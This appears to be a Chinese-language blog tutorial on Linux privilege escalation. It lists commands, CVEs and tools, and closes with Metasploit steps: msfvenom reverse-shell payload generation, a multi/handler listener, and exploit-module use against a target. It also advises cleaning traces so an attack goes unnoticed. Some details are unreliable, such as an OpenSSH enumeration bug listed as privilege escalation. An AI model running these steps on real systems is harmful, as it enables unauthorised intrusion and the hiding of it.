投稿
  1. 簡單一點首頁
  2. 編程

Linux提權指南

LTERD 編程

一、Linux提權命令

1、sudo: 允許普通用戶以超級用戶的身份進行操作。

  $ sudo {command}

2、su: 切換用戶,可用來切換到root用戶。

  $ su

3、chmod: 修改文件/目錄的權限。

  $ chmod {mode} {file}

二、Linux提權滲透

1、Dirty COW漏洞:通過修改系統中可寫的文件,控制變量達到提權的目的。

2、提權腳本:使用已經編寫好的腳本進行提權,如LinEnum.sh。

3、提權預編譯二進制文件:使用已經編譯好的二進制文件進行提權,如Linux Exploit Suggester。

三、Linux提權方式

1、內核漏洞:exploit通過C/C++語言編寫,可針對具體漏洞進行利用。

2、提權程序:使用已經提供的程序進行提權,如提權腳本、二進制文件。

3、緩衝區溢出:利用代碼中存在的漏洞,將溢出的數據作為可執行代碼來執行。

四、Linux提權環境

1、Ubuntu 18.04 LTS

2、CentOS 7

3、Kali Linux 2020.4

五、Linux提權漏洞

1、CVE-2016-5195(Dirty COW)漏洞

2、Linux內核提權漏洞(如 CVE-2015-3636、CVE-2017-16995、CVE-2019-7304)

3、OpenSSH提權漏洞(如 CVE-2018-15473)

六、Linux提權工具

1、LinEnum: 可以對系統進行詳細的信息收集,包括系統版本、內核版本、用戶、進程信息等;

2、Linux Exploit Suggester: 可以根據當前系統的內核版本,快速搜索存在的漏洞和可利用的工具;

3、Metasploit: 特別適合在滲透測試中使用,可以對系統進行掃描和攻擊,並且提供多種攻擊利用模塊。

七、Linux提權思路

1、信息收集:先了解目標機器的詳細信息,包括操作系統、內核版本、進程信息等;

2、尋找或製作漏洞:尋找可利用的漏洞,也可以根據現有的漏洞製作對應的攻擊工具;

3、利用漏洞:將製作好的工具或漏洞利用代碼運行在目標機器上;

4、獲取提權權限:在得到目標機器的控制權後,根據需要獲取對應的提權權限;

5、精心打掃痕迹:清理操作痕迹,保證攻擊不被發現。

八、Linux提權方法

1、通過提權腳本進行提權;

2、使用編譯漏洞攻擊程序進行提權;

3、在目標機器上編寫可執行代碼,以提權的方式獲取權限;

4、使用Metasploit等工具,通過漏洞進行提權。

九、Linux提權檢測引擎

1、AppArmor: 一個安全增強的Linux內核模塊,能夠控制程序運行時的安全訪問。

2、SELinux: 安全增強的Linux內核安全功能模塊,能夠強制執行訪問策略。

3、Grsecurity: 可以提供系統級別的攻擊保護,並可以檢測和防止各種攻擊。

十、Msf提權Linux

使用Metasploit進行Linux提權,需要進行如下步驟:

1、通過nmap掃描目標機器並確定漏洞;

  $ nmap -sS -sV -p- {ip}

2、針對特定的漏洞生成payload;

  $ msfvenom -p {payload type} LHOST={address} LPORT={port} -f {format} {filename}

3、啟動Payload Handler,準備接收反彈Shell;

  $ msfconsole
  msf5 > use exploit/multi/handler
  msf5 exploit(multi/handler) > set payload {payload type}
  msf5 exploit(multi/handler) > set LHOST {address}
  msf5 exploit(multi/handler) > set LPORT {port}
  msf5 exploit(multi/handler) > run

4、發送Payload至目標機器並獲取控制權。

  $ msfconsole
  msf5 > use exploit/{exploit module}
  msf5 exploit({exploit module}) > set RHOST {address}
  msf5 exploit({exploit module}) > set payload {payload type}
  msf5 exploit({exploit module}) > set LHOST {address}
  msf5 exploit({exploit module}) > set LPORT {port}
  msf5 exploit({exploit module}) > run

原創文章,作者:LTERD,如若轉載,請註明出處:https://www.506064.com/zh-hk/n/363886.html

(0)
打賞 微信掃一掃 微信掃一掃 支付寶掃一掃 支付寶掃一掃
LTERD的頭像LTERD
0 0
上一篇 2025-03-12 18:48
下一篇 2025-03-12 18:48

相關推薦

  • Java JsonPath 效率優化指南

    本篇文章將深入探討Java JsonPath的效率問題,並提供一些優化方案。 一、JsonPath 簡介 JsonPath是一個可用於從JSON數據中獲取信息的庫。它提供了一種DS…

    IGTLV的頭像 IGTLV
    編程 2025-04-29

  • 運維Python和GO應用實踐指南

    本文將從多個角度詳細闡述運維Python和GO的實際應用,包括監控、管理、自動化、部署、持續集成等方面。 一、監控 運維中的監控是保證系統穩定性的重要手段。Python和GO都有強…

    SPKJD的頭像 SPKJD
    編程 2025-04-29

  • Python wordcloud入門指南

    如何在Python中使用wordcloud庫生成文字雲? 一、安裝和導入wordcloud庫 在使用wordcloud前,需要保證庫已經安裝並導入: !pip install wo…

    XXOOI的頭像 XXOOI
    編程 2025-04-29

  • Python應用程序的全面指南

    Python是一種功能強大而簡單易學的編程語言,適用於多種應用場景。本篇文章將從多個方面介紹Python如何應用於開發應用程序。 一、Web應用程序 目前,基於Python的Web…

    EWKEZ的頭像 EWKEZ
    編程 2025-04-29

  • Python字符轉列表指南

    Python是一個極為流行的腳本語言,在數據處理、數據分析、人工智能等領域廣泛應用。在很多場景下需要將字符串轉換為列表,以便於操作和處理,本篇文章將從多個方面對Python字符轉列…

    ZTMCS的頭像 ZTMCS
    編程 2025-04-29

  • Python小波分解入門指南

    本文將介紹Python小波分解的概念、基本原理和實現方法,幫助初學者掌握相關技能。 一、小波變換概述 小波分解是一種廣泛應用於數字信號處理和圖像處理的方法,可以將信號分解成多個具有…

    QEGUW的頭像 QEGUW
    編程 2025-04-29

  • Python初學者指南:第一個Python程序安裝步驟

    在本篇指南中,我們將通過以下方式來詳細講解第一個Python程序安裝步驟: Python的安裝和環境配置 在命令行中編寫和運行第一個Python程序 使用IDE編寫和運行第一個Py…

    BURCH的頭像 BURCH
    編程 2025-04-29

  • Python起筆落筆全能開發指南

    Python起筆落筆是指在編寫Python代碼時的編寫習慣。一個好的起筆落筆習慣可以提高代碼的可讀性、可維護性和可擴展性,本文將從多個方面進行詳細闡述。 一、變量命名 變量命名是起…

    PXWNP的頭像 PXWNP
    編程 2025-04-29

  • FusionMaps應用指南

    FusionMaps是一款基於JavaScript和Flash的交互式地圖可視化工具。它提供了一種簡單易用的方式,將複雜的數據可視化為地圖。本文將從基礎的配置開始講解,到如何定製和…

    FAOSJ的頭像 FAOSJ
    編程 2025-04-29

  • Python中文版下載官網的完整指南

    Python是一種廣泛使用的編程語言,具有簡潔、易讀易寫等特點。Python中文版下載官網是Python學習和使用過程中的重要資源,本文將從多個方面對Python中文版下載官網進行…

    XGSAF的頭像 XGSAF
    編程 2025-04-29

發表回復

登錄後才能評論